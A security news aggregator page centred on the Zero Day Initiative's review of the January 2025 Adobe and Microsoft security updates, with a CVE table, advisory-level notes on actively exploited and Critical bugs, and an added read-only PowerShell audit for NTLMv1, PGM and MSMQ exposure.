PowerShell Environment VariablesThis post first appeared on blog.netwrix.com and was written by Jonathan Blackwell. Introduction to PowerShell Environment Variables: Environment variables are predefined variables in an operating system; they are available in the form of key-value pairs which store important system-level or user-specific information, such as paths, user configurations, and system settings. These variables are accessible in PowerShell scripts and sessions, playing a significant role in tasks like configuring … Continued
by Netwrix
2025-01-14 18:29:48
The January 2025 Security Update Review

Welcome to the first Patch Tuesday of the new year. Even while preparing for Pwn2Own Automotive, the second Tuesday still brings with it a bevy of security updates from Adobe and Microsoft. Take a break from avoiding your New Year’s resolutions and join us as we review the details of their latest security alerts. If you’d rather watch the full video recap covering the entire release, you can check it out here:

Adobe Patches for January 2025

For January, Adobe released five bulletins addressing 14 CVEs in Adobe Photoshop, Substance 3D Stager, Illustrator on iPad, Animate, and Substance 3D Designer. One of these bugs was reported through the Trend ZDI program. The patch for Substance 3D Stager is the largest with five Critical-rated bugs being fixed. The worst could lead to arbitrary code execution. The fix for Photoshop is also rated Critical and could result in code execution when opening malicious files. That’s also true for the patch for Adobe Illustrator on iPad. Note that this is specifically the iPad version and not the desktop version, which is interesting. The update for Substance 3D Designer addresses four Critical-rated bugs, all of which could lead to arbitrary code execution. Lastly, the patch for Adobe Animate fixes a single code execution bug. None of the bugs fixed by Adobe this month are listed as publicly known or under active attack at the time of release. Adobe categorizes these updates as a deployment priority rating of 3.

Microsoft Patches for January 2025

This month, Microsoft released 159(!) new CVEs in Windows and Windows Components, Office and Office Components, Hyper-V, SharePoint Server, .NET and Visual Studio, Azure, BitLocker, Remote Desktop Services, and the Windows Virtual Trusted Platform Module. Three of these were submitted through the Trend ZDI program.
With the addition of the third-party CVEs, the entire release tops out at 161 CVEs. Of the patches released today, 11 are rated Critical, and the other 148 are rated Important in severity. This is the largest number of CVEs addressed in any single month since at least 2017 and is more than double the usual amount of CVEs fixed in January. This comes on the heels of a record number of December patches and could be an ominous sign for patch levels in 2025. It will be interesting to see how this year shapes up. Five of these bugs are listed as publicly known, and three are listed as under active attack at the time of release. Let’s take a closer look at some of the more interesting updates for this month, starting with the bugs currently being exploited:

- CVE-2025-21333/CVE-2025-21334/CVE-2025-21335 - Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege Vulnerability
These three bugs are listed as under active attack, and all have the same description. An authenticated user could use these to execute code with SYSTEM privileges. Although not specified, I would think that if the attacker were executing code at SYSTEM on the hypervisor from a guest, the CVSS would indicate a scope change. Microsoft doesn’t list that, but I’ve disagreed with their CVSS ratings in the past. If you are running Hyper-V, make sure these patches are at the top of your list for testing and deployment.

- CVE-2025-21298 - Windows OLE Remote Code Execution Vulnerability
This bug rates a CVSS 9.8 and allows a remote attacker to execute code on a target system by sending a specially crafted mail to an affected system with Outlook. Fortunately, the preview pane is not an attack vector, but previewing an attachment could trigger the code execution. The specific flaw exists within the parsing of RTF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. As a mitigation, you can set Outlook to read all standard mail as plain text, but users will likely revolt against such a setting. The best option is to test and deploy this patch quickly.

- CVE-2025-21295 - SPNEGO Extended Negotiation (NEGOEX) Security Mechanism Remote Code Execution Vulnerability
Besides being a mouthful of a title, this bug impacts a security mechanism, which is never a good sign. It allows remote, unauthenticated attackers to execute code on an affected system without user interaction. The only good news is that there are some barriers to exploitation, but I wouldn’t rely on that fact. I would also consider this a Scope Change, but that’s splitting hairs at this point. Even if you don’t rely on the negotiation mechanism, I wouldn’t wait to test and deploy this patch.

- CVE-2025-21297/CVE-2025-21309 - Windows Remote Desktop Services Remote Code Execution Vulnerability
Both of these bugs allow arbitrary code execution on affected Remote Desktop Gateway servers from remote, unauthenticated attackers. They just need to connect to the server and trigger a race condition to create a use-after-free bug. While race conditions are somewhat tricky to exploit, we see them used at Pwn2Own frequently. Considering that exploiting this requires no user interaction, I would prioritize this patch, especially if you have these gateways exposed to the Internet.

- CVE-2025-21308 - Windows Themes Spoofing Vulnerability
This is one of the five publicly known vulnerabilities receiving fixes this month, and for a change, we know where this one is exposed publicly. It turns out that a previous patch (CVE-2024-38030) could be bypassed. The spoofing component here is NTLM credential relaying. Consequently, systems with NTLM restricted are less likely to be exploited. At a minimum, you should be restricting outbound NTLM traffic to remote servers. Fortunately, Microsoft provides guidance on setting this up.
Enable those restrictions then patch your systems.

Here’s the full list of CVEs released by Microsoft for January 2025:

| CVE | Title | Severity | CVSS | Public | Exploited | Type |
|---|---|---|---|---|---|---|
| CVE-2025-21333 | Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege Vulnerability | Important | 7.8 | No | Yes | EoP |
| CVE-2025-21334 | Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege Vulnerability | Important | 7.8 | No | Yes | EoP |
| CVE-2025-21335 | Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege Vulnerability | Important | 7.8 | No | Yes | EoP |
| CVE-2025-21186 | Microsoft Access Remote Code Execution Vulnerability | Important | 7.8 | Yes | No | RCE |
| CVE-2025-21366 | Microsoft Access Remote Code Execution Vulnerability | Important | 7.8 | Yes | No | RCE |
| CVE-2025-21395 | Microsoft Access Remote Code Execution Vulnerability | Important | 7.8 | Yes | No | RCE |
| CVE-2025-21275 | Windows App Package Installer Elevation of Privilege Vulnerability | Important | 7.8 | Yes | No | EoP |
| CVE-2025-21308 | Windows Themes Spoofing Vulnerability | Important | 6.5 | Yes | No | Spoofing |
| CVE-2025-21380 | Azure Marketplace SaaS Resources Information Disclosure Vulnerability | Critical | 8.8 | No | No | Info |
| CVE-2025-21296 | BranchCache Remote Code Execution Vulnerability | Critical | 7.5 | No | No | RCE |
| CVE-2025-21294 | Microsoft Digest Authentication Remote Code Execution Vulnerability | Critical | 8.1 | No | No | RCE |
| CVE-2025-21385 | Microsoft Purview Information Disclosure Vulnerability | Critical | 8.8 | No | No | Info |
| CVE-2025-21295 | SPNEGO Extended Negotiation (NEGOEX) Security Mechanism Remote Code Execution Vulnerability | Critical | 8.1 | No | No | RCE |
| CVE-2025-21178 | Visual Studio Remote Code Execution Vulnerability | Critical | 8.8 | No | No | RCE |
| CVE-2025-21311 | Windows NTLM V1 Elevation of Privilege Vulnerability | Critical | 9.8 | No | No | EoP |
| CVE-2025-21298 | Windows OLE Remote Code Execution Vulnerability | Critical | 9.8 | No | No | RCE |
| CVE-2025-21307 | Windows Reliable Multicast Transport Driver (RMCAST) Remote Code Execution Vulnerability | Critical | 9.8 | No | No | RCE |
| CVE-2025-21297 | Windows Remote Desktop Services Remote Code Execution Vulnerability | Critical | 8.1 | No | No | RCE |
| CVE-2025-21309 | Windows Remote Desktop Services Remote Code Execution Vulnerability | Critical | 8.1 | No | No | RCE |
| CVE-2025-21172 | .NET and Visual Studio Remote Code Execution Vulnerability | Important | 7.5 | No | No | RCE |
| CVE-2025-21173 | .NET Elevation of Privilege Vulnerability | Important | 8 | No | No | EoP |
| CVE-2025-21171 | .NET Remote Code Execution Vulnerability | Important | 8.1 | No | No | RCE |
| CVE-2025-21176 | .NET, .NET Framework, and Visual Studio Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2025-21293 | Active Directory Domain Services Elevation of Privilege Vulnerability | Important | 8.8 | No | No | EoP |
| CVE-2025-21193 | Active Directory Federation Server Spoofing Vulnerability | Important | 6.5 | No | No | Spoofing |
| CVE-2024-7344 * | Cert CC: CVE-2024-7344 Howyar Taiwan Secure Boot Bypass | Important | 6.7 | No | No | SFB |
| CVE-2025-21338 | GDI+ Remote Code Execution Vulnerability | Important | 7.8 | No | No | RCE |
| CVE-2024-50338 * | GitHub: CVE-2024-50338 Malformed URL allows information disclosure through git-credential-manager | Important | 7.4 | No | No | Info |
| CVE-2025-21326 | Internet Explorer Remote Code Execution Vulnerability | Important | 7.8 | No | No | RCE |
| CVE-2025-21231 | IP Helper Denial of Service Vulnerability | Important | 7.5 | No | No | DoS |
| CVE-2025-21189 | MapUrlToZone Security Feature Bypass Vulnerability | Important | 4.3 | No | No | SFB |
| CVE-2025-21219 | MapUrlToZone Security Feature Bypass Vulnerability | Important | 4.3 | No | No | SFB |
| CVE-2025-21268 | MapUrlToZone Security Feature Bypass Vulnerability | Important | 4.3 | No | No | SFB |
| CVE-2025-21328 | MapUrlToZone Security Feature Bypass Vulnerability | Important | 4.3 | No | No | SFB |
| CVE-2025-21329 | MapUrlToZone Security Feature Bypass Vulnerability | Important | 4.3 | No | No | SFB |
| CVE-2025-21332 | MapUrlToZone Security Feature Bypass Vulnerability | Important | 4.3 | No | No | SFB |
| CVE-2025-21360 | Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability | Important | 7.8 | No | No | EoP |
| CVE-2025-21315 | Microsoft Brokering File System Elevation of Privilege Vulnerability | Important | 7.8 | No | No | EoP |
| CVE-2025-21372 | Microsoft Brokering File System Elevation of Privilege Vulnerability | Important | 7.8 | No | No | EoP |
| CVE-2025-21281 | Microsoft COM for Windows Elevation of Privilege Vulnerability | Important | 7.8 | No | No | EoP |
| CVE-2025-21304 | Microsoft DWM Core Library Elevation of Privilege Vulnerability | Important | 7.8 | No | No | EoP |
| CVE-2025-21354 | Microsoft Excel Remote Code Execution Vulnerability | Important | 7.8 | No | No | RCE |
| CVE-2025-21362 | Microsoft Excel Remote Code Execution Vulnerability | Important | 7.8 | No | No | RCE |
| CVE-2025-21364 | Microsoft Excel Security Feature Bypass Vulnerability | Important | 7.8 | No | No | SFB |
| CVE-2025-21230 | Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability | Important | 7.5 | No | No | DoS |
| CVE-2025-21251 | Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability | Important | 7.5 | No | No | DoS |
| CVE-2025-21270 | Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability | Important | 7.5 | No | No | DoS |
| CVE-2025-21277 | Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability | Important | 7.5 | No | No | DoS |
| CVE-2025-21285 | Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability | Important | 7.5 | No | No | DoS |
| CVE-2025-21289 | Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability | Important | 7.5 | No | No | DoS |
| CVE-2025-21290 | Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability | Important | 7.5 | No | No | DoS |
| CVE-2025-21220 | Microsoft Message Queuing Information Disclosure Vulnerability | Important | 7.5 | No | No | Info |
| CVE-2025-21223 | Microsoft Message Queuing Information Disclosure Vulnerability | Important | 7.5 | No | No | Info |
| CVE-2025-21402 | Microsoft Office OneNote Remote Code Execution Vulnerability | Important | 7.8 | No | No | RCE |
| CVE-2025-21365 | Microsoft Office Remote Code Execution Vulnerability | Important | 7.8 | No | No | RCE |
| CVE-2025-21346 † | Microsoft Office Security Feature Bypass Vulnerability | Important | 7.1 | No | No | SFB |
| CVE-2025-21345 | Microsoft Office Visio Remote Code Execution Vulnerability | Important | 7.8 | No | No | RCE |
| CVE-2025-21356 | Microsoft Office Visio Remote Code Execution Vulnerability | Important | 7.8 | No | No | RCE |
| CVE-2025-21357 | Microsoft Outlook Remote | | | | | |
Code Execution Vulnerability Important 6.7 No No RCE CVE-2025-21361 Microsoft Outlook Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-21187 Microsoft Power Automate Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-21344 Microsoft SharePoint Server Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-21348 Microsoft SharePoint Server Remote Code Execution Vulnerability Important 7.2 No No RCE CVE-2025-21393 Microsoft SharePoint Server Spoofing Vulnerability Important 6.3 No No Spoofing CVE-2025-21363 Microsoft Word Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-21403 On-Premises Data Gateway Information Disclosure Vulnerability Important 6.4 No No Info CVE-2025-21211 Secure Boot Security Feature Bypass Vulnerability Important 6.8 No No SFB CVE-2025-21213 Secure Boot Security Feature Bypass Vulnerability Important 4.6 No No SFB CVE-2025-21215 Secure Boot Security Feature Bypass Vulnerability Important 4.6 No No SFB CVE-2025-21405 Visual Studio Elevation of Privilege Vulnerability Important 7.3 No No EoP CVE-2025-21210 Windows BitLocker Information Disclosure Vulnerability Important 4.2 No No Info CVE-2025-21214 Windows BitLocker Information Disclosure Vulnerability Important 4.2 No No Info CVE-2025-21271 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-21272 Windows COM Server Information Disclosure Vulnerability Important 6.5 No No Info CVE-2025-21288 Windows COM Server Information Disclosure Vulnerability Important 6.5 No No Info CVE-2025-21207 Windows Connected Devices Platform Service (Cdpsvc) Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-21336 Windows Cryptographic Information Disclosure Vulnerability Important 5.6 No No Info CVE-2025-21378 Windows CSC Service Elevation of Privilege Vulnerability Important 7.8 No No Info CVE-2025-21374 Windows CSC Service Information Disclosure Vulnerability Important 5.5 
No No Info CVE-2025-21227 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21228 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21229 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21232 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21249 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21255 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21256 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21258 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21260 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21261 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21263 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21265 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21310 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21324 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21327 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21341 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21291 Windows Direct Show Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21274 Windows Event Tracing Denial of Service Vulnerability Important 5.5 No No DoS CVE-2025-21301 Windows Geolocation Service Information Disclosure Vulnerability Important 6.5 No No Info CVE-2025-21382 Windows Graphics Component Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-21269 Windows 
HTML Platforms Security Feature Bypass Vulnerability Important 4.3 No No SFB CVE-2025-21287 Windows Installer Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-21331 Windows Installer Elevation of Privilege Vulnerability Important 7.3 No No EoP CVE-2025-21218 Windows Kerberos Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-21242 Windows Kerberos Information Disclosure Vulnerability Important 5.9 No No Info CVE-2025-21299 Windows Kerberos Security Feature Bypass Vulnerability Important 7.1 No No SFB CVE-2025-21316 † Windows Kernel Memory Information Disclosure Vulnerability Important 5.5 No No Info CVE-2025-21317 Windows Kernel Memory Information Disclosure Vulnerability Important 5.5 No No Info CVE-2025-21318 Windows Kernel Memory Information Disclosure Vulnerability Important 5.5 No No Info CVE-2025-21319 † Windows Kernel Memory Information Disclosure Vulnerability Important 5.5 No No Info CVE-2025-21320 Windows Kernel Memory Information Disclosure Vulnerability Important 5.5 No No Info CVE-2025-21321 Windows Kernel Memory Information Disclosure Vulnerability Important 5.5 No No Info CVE-2025-21323 Windows Kernel Memory Information Disclosure Vulnerability Important 5.5 No No Info CVE-2025-21225 Windows Line Printer Daemon (LPD) Service Remote Code Execution Vulnerability Important 8.1 No No RCE CVE-2025-21276 Windows MapUrlToZone Denial of Service Vulnerability Important 7.5 No No SFB CVE-2025-21217 Windows Mark of the Web Spoofing Vulnerability Important 6.5 No No Spoofing CVE-2025-21234 Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-21235 Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-21202 Windows Recovery Environment Agent Elevation of Privilege Vulnerability Important 6.1 No No EoP CVE-2025-21226 Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability Important 5.9 No No DoS CVE-2025-21278 Windows 
Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability Important 6.2 No No DoS CVE-2025-21330 Windows Remote Desktop Services Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-21292 Windows Search Service Elevation of Privilege Vulnerability Important 8.8 No No EoP CVE-2025-21313 Windows Security Account Manager (SAM) Denial of Service Vulnerability Important 6.5 No No DoS CVE-2025-21312 Windows Smart Card Reader Information Disclosure Vulnerability Important 2.4 No No Info CVE-2025-21314 Windows SmartScreen Spoofing Vulnerability Important 6.5 No No Spoofing CVE-2025-21224 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21233 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21236 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21237 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21238 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21239 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21240 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21241 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21243 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21244 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21245 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21246 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21248 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21250 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 
No No RCE CVE-2025-21252 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21266 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21273 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21282 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21286 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21302 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21303 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21305 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21306 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21339 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21409 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21411 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21413 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21417 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21300 Windows upnphost.dll Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-21389 Windows upnphost.dll Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-21280 Windows Virtual Trusted Platform Module Denial of Service Vulnerability Important 5.5 No No DoS CVE-2025-21284 Windows Virtual Trusted Platform Module Denial of Service Vulnerability Important 5.5 No No DoS CVE-2025-21370 Windows Virtualization-Based Security (VBS) Enclave Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-21340 Windows 
Virtualization-Based Security (VBS) Security Feature Bypass Vulnerability Important 5.5 No No SFB CVE-2025-21343 Windows Web Threat Defense User Service Information Disclosure Vulnerability Important 7.5 No No Info CVE-2025-21257 Windows WLAN AutoConfig Service Information Disclosure Vulnerability Important 5.5 No No Info * Indicates this CVE had been released by a third party and is now being included in Microsoft releases. † Indicates further administrative actions are required to fully address the vulnerability.Moving on to the other Critical-rated bugs, the vulnerability in Visual Studio requires a user to load a malicious package file. The bug in BranchCache is restricted to adjacent systems only. The bug in RMCAST requires a program listening on a Pragmatic General Multicast (PGM) port. Since there’s no authentication in PGM, these systems should not be exposed to the internet. However, on these systems, this bug is technically wormable – just only between systems configured in this manner. The NTLM bug is disturbing since it can be reached from the internet, but it only affects NTLMv1. You have updated everything to v2 – right? If not, Microsoft provides some guidance on making that happen. The bug in the Digest Authentication works in the same manner as the Remote Desktop bugs mentioned above. Finally, there a couple of other Critical bugs documented, but there’s no action for the end user as Microsoft already mitigated them.There are almost 60 code execution bugs receiving fixes this month, including several open-and-own bugs in Office components. This includes three publicly known bugs in Access. Only one of these bugs can be hit from the Preview Pane by previewing attachments, and that is for legacy versions of Outlook for Mac. The Windows Telephony Service receives 28 patches this month. However, these require user interaction and are unlikely to be exploited. The bug in Direct Show requires an authenticated user to click a malicious link. 
Beyond the open-and-own bug in .NET and Visual Studio, the other code execution vulnerability in .NET requires extensive user interaction. The bug in GDI+ also requires the attacker to be authenticated. Finally, the bug in the Line Printer Daemon reminds me of the PrintNightmare bugs from a few years ago. An attacker would just need to send a specially crafted request to an affected system to gain arbitrary code execution on the server. And yes, that is an update for Internet Explorer you see. No matter how hard we try, we can’t be rid of the thing. At least it requires user interaction.The January release includes more than three dozen privilege escalation bugs. However, most of these either lead to SYSTEM-level code execution or administrative privileges if an authenticated user runs specially crafted code. There are some notable exceptions. More than half of these are for the Digital Media component and require the attacker to plug in a USB drive into an affected system. This would lead to code execution as SYSTEM. The bug in the Recovery Environment also requires physical access, but Microsoft provides no further information on how it would be exploited. Several of the EoP fixes this month are related to container or sandbox escapes. For example, the bugs in the Brokering File System can be executed in a low-privileged AppContainer but result in access beyond what is intended. The bugs in PrintWorkflowUserSvc also result in sandbox escapes. The remaining bugs lead to access beyond what is intended, but these are not likely to be exploited due to their access complexity.There are a dozen different security feature bypass (SFB) bugs receiving fixes this month, and the one that immediately jumps out is the bypass of Mark of the Web (MoTW) protections. We saw this technique used often in 2024 by ransomware and crypto scammers. The bug in Excel evades macro protections. Similarly, the SFB in Office bypasses Windows Defender Application Control (WDAC) enforcement. 
There are multiple updates for this one, too, so make sure you get them all. The bugs in Secure Boot bypass – you guessed it – Secure Boot. They list the title as Kerberos, but the Windows Defender Credential Guard Feature is really what’s being bypassed, which could leak Kerberos credentials. The bugs bypassing MapUrlToZone and HTML Platform Security protections require user interaction. Microsoft provides no information on what is being bypassed in the Virtualization-Based Security (VBS) component, so let the speculation begin.This release includes fixes for multiple information disclosure bugs and most simply result in info leaks consisting of unspecified memory contents. There are a few that also lead to the disclosure of the ever-nebulous “sensitive information.” However, there are some significant information disclosure bugs receiving fixes this month. The first is in the SAP HANA SSO for On-Premises Data Gateway, which could disclose PowerBI data available from the dashboard. A few of the Kernel bugs are special as well. They only disclose random heap memory, but they require multiple patches to fully resolve the vulnerability. The bug in the Cryptographic component could leak the contents of encrypted PKCS1 information. The most troubling are the bugs in BitLocker. One could disclose unencrypted hibernation images in cleartext, while the other leaks the BitLocker key. Both of these require physical access, but since BitLocker is specifically designed to block attackers with physical access, it makes these bugs rather unfortunate.Microsoft must have heard our pleas because there is actually a small amount of detail given for the 20 Denial-of-Service (DoS) bugs being fixed this month. The bugs in Message Queuing impact the availability of the service when an attacker sends specially crafted packets to the service. That’s the same for the Connected Devices Platform Service (Cdpsvc). 
The bug in the IP Helper results in an application crash if specially crafted packets are received by the app. The bug in the Security Account Manager (SAM) would cause the app to crash, but it’s not clear if it would automatically restart. The bug in the TPM could result in a total loss of availability. Alas, we will need to cry louder, for that is all of the detail Microsoft provides regarding the DoS fixes this month.Finally, there are three spoofing bugs fixed in the release. The bug in SmartScreen looks awfully familiar, as the researcher credited has reported several spoofing bugs in SmartScreen. This always makes me think the previous patches were insufficient. The spoofing bug in SharePoint presents as a cross-site scripting (XSS) bug. No real information is given about the spoofing bug in Active Directory Federation Server other than to say that user interaction is required.No new advisories are being released this month.Looking AheadThe next Patch Tuesday of 2025 will be on February 11, and assuming I survive Pwn2Own Automotive, I’ll return with my analysis and thoughts about the release. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!
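The Critical-bug discussion above leaves three questions for an administrator: is NTLMv1 still accepted anywhere (CVE-2025-21311), is the Reliable Multicast (PGM) driver present on a host that faces the internet (CVE-2025-21307), and is Message Queuing installed where it is not needed (the seven MSMQ DoS fixes). The PowerShell below is an added, read-only audit written for this page; it is not code from the ZDI post or from Microsoft. It reads LmCompatibilityLevel, lists recent NTLM V1 logons from Security event 4624 (field LmPackageName), and checks for the driver and service. The names 'RMCAST' for the PGM kernel driver and 'MSMQ' for the Message Queuing service are assumptions; run it from an elevated prompt so the Security log is readable.

```powershell
# Added example, not code from the ZDI post or from Microsoft. Read-only audit of
# the legacy-protocol exposure discussed in the January 2025 release notes.
# Run from an elevated prompt so the Security log can be read; nothing here
# changes configuration.

function Get-NtlmV1Exposure {
    # LmCompatibilityLevel (DWORD under HKLM\SYSTEM\CurrentControlSet\Control\Lsa):
    #   0-2  the client may still send LM or NTLMv1
    #   3-4  the client sends NTLMv2 only, but the host still accepts NTLMv1 inbound
    #   5    the host also refuses LM and NTLMv1 when acting as a server
    # An absent value means the OS default applies; report that for review rather
    # than assuming it is safe.
    $lsa   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $item  = Get-ItemProperty -Path $lsa -Name LmCompatibilityLevel -ErrorAction SilentlyContinue
    $level = if ($null -ne $item) { [int]$item.LmCompatibilityLevel } else { $null }

    [pscustomobject]@{
        Check  = 'LmCompatibilityLevel'
        Value  = if ($null -eq $level) { 'not set (OS default)' } else { $level }
        Status = if ($level -eq 5) { 'OK' } elseif ($null -eq $level) { 'VERIFY' } else { 'WEAK' }
    }
}

function Get-RecentNtlmV1Logons {
    param([int]$Days = 7)
    # Security event 4624 records the NTLM variant in its "Package Name (NTLM only)"
    # field, stored in EventData as LmPackageName. Rows reading 'NTLM V1' are the
    # clients that would break when the level is raised to 5, so fix those first.
    $since = (Get-Date).AddDays(-$Days).ToUniversalTime().ToString('o')
    $xpath = "*[System[EventID=4624 and TimeCreated[@SystemTime>='$since']]" +
             " and EventData[Data[@Name='LmPackageName']='NTLM V1']]"

    Get-WinEvent -LogName Security -FilterXPath $xpath -ErrorAction SilentlyContinue |
        ForEach-Object {
            $data = ([xml]$_.ToXml()).Event.EventData.Data
            [pscustomobject]@{
                Time        = $_.TimeCreated
                User        = ($data | Where-Object Name -eq 'TargetUserName').'#text'
                Workstation = ($data | Where-Object Name -eq 'WorkstationName').'#text'
                SourceIp    = ($data | Where-Object Name -eq 'IpAddress').'#text'
            }
        }
}

function Get-LegacyTransportExposure {
    # Assumed names: 'RMCAST' for the Reliable Multicast (PGM) kernel driver and
    # 'MSMQ' for the Message Queuing service. "Not installed" is the desired state
    # on anything reachable from the internet, since PGM has no authentication.
    $pgm  = Get-CimInstance -ClassName Win32_SystemDriver -Filter "Name='RMCAST'" -ErrorAction SilentlyContinue
    $msmq = Get-Service -Name 'MSMQ' -ErrorAction SilentlyContinue

    [pscustomobject]@{
        Check  = 'RMCAST (PGM) driver'
        Value  = if ($pgm) { $pgm.State } else { 'not installed' }
        Status = if ($pgm -and $pgm.State -eq 'Running') { 'REVIEW' } else { 'OK' }
    }
    [pscustomobject]@{
        Check  = 'MSMQ service'
        Value  = if ($msmq) { [string]$msmq.Status } else { 'not installed' }
        Status = if ($msmq -and $msmq.Status -eq 'Running') { 'REVIEW' } else { 'OK' }
    }
}

# Report: configuration findings first, then the NTLM V1 clients seen recently.
$findings = @(Get-NtlmV1Exposure) + @(Get-LegacyTransportExposure)
$findings | Format-Table -AutoSize

$v1 = @(Get-RecentNtlmV1Logons -Days 7)
"NTLM V1 logons seen in the last 7 days: $($v1.Count)"
$v1 | Sort-Object Time -Descending | Select-Object -First 20 | Format-Table -AutoSize
```

The logon query is the useful half: a host that reports LmCompatibilityLevel 3 with zero NTLM V1 logons over a week can be raised to 5 with little risk, while a host that reports several distinct workstations still negotiating NTLM V1 has an inventory problem to solve before the registry change, or those clients stop authenticating.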
by Zero Day Initiative Blog
2025-01-14 17:50:24
Zero-Day Security Bug Likely Fueling Fortinet Firewall Attacks
An ongoing campaign targeting FortiGate devices with management interfaces exposed on the public Internet is leading to unauthorized administrative logins and configuration changes, creating new accounts, and performing SSL VPN authentication.
by Dark Reading
2025-01-14 17:16:51
Companies Double Down on AI and Supply Chain Security, According to Black Duck’s BSIMM15 Report
Organisations worldwide are ramping up efforts to tackle emerging security risks in artificial intelligence (AI) and software supply chains, according to the newly released BSIMM15 report from Black Duck. The report, which examines software security practices across 121 companies, reveals a sharp increase in activities aimed at strengthening defenses against evolving threats. Key findings from […]
by IT Security Guru
2025-01-14 16:35:13
DOJ confirms FBI operation that mass-deleted Chinese malware from thousands of US computers
The FBI says it was authorized to mass-remove “PlugX” malware from more than 4,000 compromised machines in the United States.
by TechCrunch